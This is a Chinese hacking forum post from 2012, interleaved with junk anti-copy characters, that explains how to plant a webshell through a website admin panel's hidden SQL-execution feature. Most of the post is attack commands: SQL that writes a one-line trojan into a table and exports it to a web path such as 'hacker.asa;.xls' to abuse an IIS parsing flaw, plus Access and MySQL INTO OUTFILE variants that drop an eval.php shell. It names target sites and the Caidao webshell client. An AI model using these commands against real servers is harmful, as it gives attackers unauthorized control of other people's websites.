好不容易进了后台,发现啥上传啊。备份啊多木有。3 D6 |& C- y9 I9 j# V9 T4 v
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
/ m% Y1 ?0 ?8 n' l- V* x0 u" ?文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,* h- ^ W: S' P% l- L) |
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:1 P( p9 W+ [4 G' l1 n3 @2 ]. r" n( T
1.create table cmd (a varchar(50))$ m+ t6 f: y+ n7 {; U8 C' G
2.insert into cmd (a) values (‘‘)
& [6 h; g* U& {% t0 b3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
. Z' m0 ?4 a) Z- J- [" B; R(把表cmd的内容导出为物理路径的一个EXCEL文件)8 f/ ]6 P$ D& N: @2 L8 [& Z/ U
4.drop table cmd
* ^7 _* X( |/ Z利用IIS的BUG成功拿到了WEBSHELL。
) B2 \1 i( s% ~9 s
* Z$ U2 ~) G% H) ?" u直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
4 I0 U; \0 T9 u. u' E7 B5 v3 g
, Q9 }6 c' P6 @8 D. P* P SQL语句意思解释:! D! `4 l @' e1 Q0 h
第一句3 X; ?5 A$ U8 f2 z. w0 @% n
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为503 o0 A5 p$ |& U
' d! } Y1 \: g8 U 第二句0 P% x% V3 l0 r! y) }' c
在表cmd的a字段插入一句话木马
0 `" p* G/ {) J K" B 第三句
8 y! T/ ]# v& w% t: i1 i+ { 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件3 {; N+ {9 \( Q! W% Z5 D$ W
# m$ d1 V) Z% c 第四句
) t/ T4 C" \7 a7 P) t5 w 删除建立的cmd表
* q/ |: U* Y2 f5 _' t$ ?, z) o; w( i! Q1 ^) c) ?4 N1 H
以下内容为测试:9 V1 D4 Y. y, |% X
Access利用后台SQL执行命令功能导出WebShell:! ^! s, t/ b: n2 Y( m
这个更简单:
* U+ r0 q; o5 O6 E9 s0 l [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]" u# x% O5 U5 P
或者
$ |: {; ~0 M+ H$ R [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol], n5 u; g) H: |2 f
: j+ _7 J9 K$ Z" T. Z
后台有执行SQL语句功能(vote为已知表段)8 {1 [7 f+ o- G4 d, H( K
希望对大家有所帮助拿shell的又一个思路
1 |) E- _' K9 W3 L |
发表于 2012-9-13 17:53:58
收藏
分享
支持
反对